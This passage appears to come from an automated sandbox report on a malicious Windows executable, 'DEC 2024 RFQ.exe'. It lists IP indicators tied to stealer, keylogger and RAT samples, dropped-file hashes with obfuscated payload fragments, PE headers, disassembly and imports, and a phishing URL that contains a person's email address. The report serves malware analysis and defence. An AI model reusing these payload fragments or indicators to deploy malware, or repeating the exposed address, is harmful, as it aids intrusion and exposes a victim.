                                                                                                                    api.telegram.orgItaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Hesap_Hareketleri_09122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    TELEGRAMRUItaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    • 149.154.167.220
                                                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                    • 149.154.167.220
ST07933.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Hesap_Hareketleri_10122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match: CLOUDFLARENETUS
LXS5itpTK7.exe | malicious | Stealc | 104.21.56.70
https://advertising-case-id419348.d1yaxxd8bf42y5.amplifyapp.com/ | malicious | Unknown | 104.26.5.15
apDMcnqqWs.exe | malicious | Unknown | 162.159.138.232
e8YDxjwJiT.exe | malicious | Unknown | 104.21.27.3
TlNDyT2f5c.exe | malicious | Unknown | 104.21.27.3
https://www.picotech.com/download/software/sr/PicoScope6_r6_14_69.exe | malicious | Havoc | 172.67.0.58
Itaxyhi.exe | malicious | Phemedrone Stealer | 172.67.70.233
SEejSLAS9f.exe | malicious | Stealc | 172.67.179.207
CJE003889.exe | malicious | FormBook | 172.67.158.81
https://hongkongliving.com | malicious | CAPTCHA Scam ClickFix | 104.18.33.8
Match: UTMEMUS
file.exe | malicious | Snake Keylogger | 132.226.8.169
Request for quote.doc | malicious | Snake Keylogger | 132.226.247.73
ST07933.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
Price Quotation-01.dqy.dll | malicious | Snake Keylogger | 132.226.8.169
ORDER-6070Y689_0PF57682456_DECVC789378909740.js | malicious | WSHRat, Snake Keylogger | 132.226.8.169
Hesap_Hareketleri_10122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
E-dekont.exe | malicious | MassLogger RAT | 132.226.247.73
Hesaphareketi-01.pdf.exe | malicious | Snake Keylogger | 132.226.247.73
10122024Hesap hareketleriniz.exe | malicious | Snake Keylogger | 132.226.247.73
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Itaxyhi.exe | malicious | Phemedrone Stealer | 104.21.67.152
file.exe | malicious | Snake Keylogger | 104.21.67.152
Confirm revised invoice to proceed with payment ASAP.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe | malicious | GuLoader | 104.21.67.152
Bank Swift and SOA PRN0072700314159453_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 104.21.67.152
ST07933.exe | malicious | GuLoader, Snake Keylogger | 104.21.67.152
fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
New_Order_List.exe | malicious | Snake Keylogger | 104.21.67.152
Price Quotation-01.dqy.dll | malicious | Snake Keylogger | 104.21.67.152
Match: 3b5074b1b5d032e5620f69f9f700ff0e
apDMcnqqWs.exe | malicious | Unknown | 149.154.167.220
e8YDxjwJiT.exe | malicious | Unknown | 149.154.167.220
TlNDyT2f5c.exe | malicious | Unknown | 149.154.167.220
Itaxyhi.exe | malicious | Phemedrone Stealer | 149.154.167.220
Aclatis tool.exe | malicious | Unknown | 149.154.167.220
Aclatis tool.exe | malicious | Unknown | 149.154.167.220
Confirm revised invoice to proceed with payment ASAP.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
751ietQPnX.lnk | malicious | RHADAMANTHYS | 149.154.167.220
l92fYljXWF.lnk | malicious | RHADAMANTHYS | 149.154.167.220
                                                                                                                    No context
                                                                                                                    Process:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):138852
                                                                                                                    Entropy (8bit):7.938511237150346
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:/OY306iGNplGdhPFICpYDAM+a6XQ5deNpv4iqo2evQVzvAxd:2vUpMX9p0TNvaXgV8d
                                                                                                                    MD5:7138923F61C53D2F37EB7739F51620E1
                                                                                                                    SHA1:9F986E9BF2752B80A44815E1EC68622A78678F33
                                                                                                                    SHA-256:DCC9724E91AFB7EBACE5F96AF6187AE3E4D2E74DFC5672A7D1A9D1A520030B10
                                                                                                                    SHA-512:BA0A7CC6ECE58A1DB5736C185E4C8306E795C9E4AD5A6ED15DCD7F59E977C9FB73E767B3E4EF9420BC1D517042F1CE1A4980D81CABF1138365D111E1BCA3BEAB
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:EA06..0...{4..V.N.U..=w:mB..j...R.J..i4 .rp..Tf3j.T._40..m.....Z...XKG....`R..#F.N..J...-..d.i..U+.I&3.b.b......U/..(.....l7:.V.W.....sZJ.Na=..g5iU^.N..9....Q*w...+=.."..U..\..\`....P.M.Ui@....]..ZAS.W....V.^....?...F....b3Y.V....TfT*.....).....C..@..J..j....R.\.....jS....\..\p..@...;...`..N...@.9...)V..9..*..-...dRY.&.N..f....U..(~..........`.,_....T.th4.Oz.H.......a........u+.W;_...u....S.L....v.... .\....P.R*..I..K0.qF.E%.....p.... ..$..N@.....G.E)T....H......Q....U.aS.s.t:M6cv.S.]j5N.5......T.S...M...N*....c6.ug.i.^...P6..%V.U...:..k..O...E..J..H4*tJ.D.k...VE|.T......h...s......E$3....R.t..r.`.N*....=.Ug....0........F..*uX...K....:.*.a...UZe.q|.Kk.....9.K.=J..+`..)....{..*uY.J7S.[&..M&.~.Y#R...y.._.r. .)a...s....}..9...=W@..N.s.....t)?..8.Q....}.U....C..m..D.IV.U.u....3.F..I.4...G@..E...S)s.4b7T.P&5..K`..s....)U..&......*P*.X...Q..-..E..S.Mb.....H.O..k.Na6.Ubt....N.Rlvy.@.\.I@...r.;.Ih5Ju".J.L.T.9..f3+G~sT.Q.4.U..J..."...IQ..'...ZiQ.L..
                                                                                                                    Process:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):14622
                                                                                                                    Entropy (8bit):7.624096492649416
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:ITYznw6siKOPIyznfvWME9lMYIUR+ncXyhUlupji66:IAw6si7nfvWLws1F
                                                                                                                    MD5:148971D56461C7AD192459A12BA15568
                                                                                                                    SHA1:7184DF587500F708D7C648CE853CAF45C16162A3
                                                                                                                    SHA-256:344D53DFF49F5900BD702975EF709664BEF139C145B9C3D7BA1EF85C4008FB37
                                                                                                                    SHA-512:9E55AF2C8DE31E0F83EF4399D94F77FD48CBC0A7A2F860E6893334180FF84934BB0F3141A7B893A9FACBBE540334E16585B1EED0197FD9ADD2C14EB5F8F35B98
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                                                                    Process:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):274432
                                                                                                                    Entropy (8bit):6.825514628477581
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:3giqprKgW+qk+XBt2bCMzOfyvCt5+06CvVTzvU:3lqprK6CnAvvC20rvBzs
                                                                                                                    MD5:2386EBDBB179113CDF6C14E192B6B9E2
                                                                                                                    SHA1:A9D2BCB1C1B07991251153CB30E1FF83761D55C8
                                                                                                                    SHA-256:C7A622B284E8DD4B86BE71AC9A7458047A9F9E9A2B7F35DDF5009E5C81EC1FB0
                                                                                                                    SHA-512:4B353FFF0BC1DC6AD4CB66C4A69DC932A8C60F199EE6735A43497F37BAA303CA25BF3DF23D91A20604A39A799074371D9B31EC85ADF77B05EA721FB1427E11F4
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:...IAUHN<VDS..6B.9V0STNJ.IIBUHN8VDSQ16BU9V0STNJCIIBUHN8VDSQ1.BU9X/.ZN.J.h.T....,:".F0:^$Q>t-+-'&6u*+.$1=qXXb.v..>;*/mDDHqHN8VDSQasBUuW3S...%IIBUHN8V.SS0=C.9V*WTN^CIIBUH..RDSq16B.=V0S.NJcIIBWHN<VDSQ16BQ9V0STNJC.MBUJN8VDSQ36..9V ST^JCIIRUH^8VDSQ1&BU9V0STNJCI.uQH.8VDS.56UE9V0STNJCIIBUHN8VDSQQ2BY9V0STNJCIIBUHN8VDSQ16BU9V0STNJCIIBUHN8VDSQ16BU9V0STNjCIABUHN8VDSQ16Ju9VxSTNJCIIBUHN."!+%16B.!R0StNJCSMBUJN8VDSQ16BU9V0StNJ#g;1'+N8VSCQ16.Q9V"STNVGIIBUHN8VDSQ16.U9..!1"% IINUHN86@SQ36BU.R0STNJCIIBUHN8.DS.16BU9V0STNJCIIBUxv<VDSQ1~BU9T0VT..AI).THM8VD.Q10..;V.STNJCIIBUHN8VDSQ16BU9V0STNJCIIBUHN8VDSQ16BU.+.\...*:.UHN8VDRS22D]1V0STNJCI7BUH.8VD.Q16uU9V.STN'CIIfUHNFVDS/16B19V0!TNJ"IIB.HN89DSQ_6BUGV0SJLbcIIH.nN:~eSQ;6h.Jt0S^.KCIM1vHN2.FSQ5EfU9\.PTNN0lIB_.J8V@ w16H.<V0W~.J@._DUHUWoDS[15.@?V0H~hJAasBUBN.pDP.$0BU"|.SV.CCIMh.;S8VB{.16H!0V0Q.DJCMc\W`.8VNysO=BU=}0yv0FCIMiUblF[DSU.6hK;.=STJ`a7GBULe8|f-^16F~9|.Q.AJCMc`+XN8RoS{.HSU9R.S~l4QIIF~Hd.(WSQ5.B..($STJaCck<@HN<}DysO BU=}0yv0]CIMiUblFNDSU.6hK;.(STJ`Ec+B'.[8&G
                                                                                                                    Process:C:\Users\user\Desktop\DEC 2024 RFQ.exe
                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):143378
                                                                                                                    Entropy (8bit):2.9930818019662
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:AIXLr44+F05BDKoPH70FlkvjA6oGJWvGcu29IwyJuv35rWVjjYqnBaAJZdjurebD:H3LjwknWGcu29IwyJuv35rWVgqnBaA
                                                                                                                    MD5:EAFE1A7A774A77396F39A32AD769E49E
                                                                                                                    SHA1:15ED3CE62E9145FD0DA627D66581F932F8F1E19D
                                                                                                                    SHA-256:AE4294EA8D412112A05319EF9D36C240AD111FCA54EFBAFCEB9CB20C32298266
                                                                                                                    SHA-512:828AC04CD8041B76B731C3A29F74C086FA8442174C9A97BA9E286AED6654A438DED7D8D4479273F0B8954C76C67D4698A980FB5D8748FAD7A4781864BA641EF7
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9
                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):6.989132493353303
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:DEC 2024 RFQ.exe
                                                                                                                    File size:1'010'688 bytes
                                                                                                                    MD5:34b4d7918dc670f64013e5d1f58a85cd
                                                                                                                    SHA1:dc5af092e9c5b2b38a2e72b03a2784fad36f20e6
                                                                                                                    SHA256:3a0034689c3ef94d1e243b02eeca73fa564da13b1f09509d9cc290240ccc2b17
                                                                                                                    SHA512:080f3df60bff200c4d29a65eb67dcc381bc04200c5b6e3681b2592ef64aa776e04cb71e8966b8cb56c42577cbc2be89ff8beb1e1d99ff54f1d18a7fdd2102907
                                                                                                                    SSDEEP:24576:tu6J33O0c+JY5UZ+XC0kGso6FaSrQ00voPIWY:fu0c++OCvkGs9FaSrZ0wDY
                                                                                                                    TLSH:6025BE22B3DDC360CB669173BF69B7056EBF7C610630B85B2F980D79A950171262C7A3
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                    Icon Hash:6b69616563c36a25
                                                                                                                    Entrypoint:0x427dcd
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x6758BF92 [Tue Dec 10 22:24:18 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007FABB8BDC85Ah
jmp 00007FABB8BCF624h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FABB8BCF7AAh
cmp edi, eax
jc 00007FABB8BCFB0Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FABB8BCF7A9h
rep movsb
jmp 00007FABB8BCFABCh
cmp ecx, 00000080h
jc 00007FABB8BCF974h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FABB8BCF7B0h
bt dword ptr [004BE324h], 01h
jc 00007FABB8BCFC80h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FABB8BCF94Dh
test edi, 00000003h
jne 00007FABB8BCF95Eh
test esi, 00000003h
jne 00007FABB8BCF93Dh
bt edi, 02h
jnc 00007FABB8BCF7AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FABB8BCF7B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FABB8BCF805h
bt esi, 03h
jnc 00007FABB8BCF858h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x2e378 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf6000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x2e378 | 0x2e400 | 067ef990aebdf95e234c494403552e32 | False | 0.9534470016891892 | data | 7.91696298436049 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf6000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc7458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc7580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc76a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc77d0 | 0xe23 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.8623929262227135
RT_MENU | 0xc85f4 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xc8644 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xc8bd8 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xc9264 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xc96f4 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xc9cf0 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xca34c | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xca7b4 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xca90c | 0x2a550 | data | | | 1.0003518040047983
RT_GROUP_ICON | 0xf4e5c | 0x14 | data | English | Great Britain | 1.2
RT_GROUP_ICON | 0xf4e70 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xf4e84 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xf4e98 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xf4eac | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0xf4f88 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, 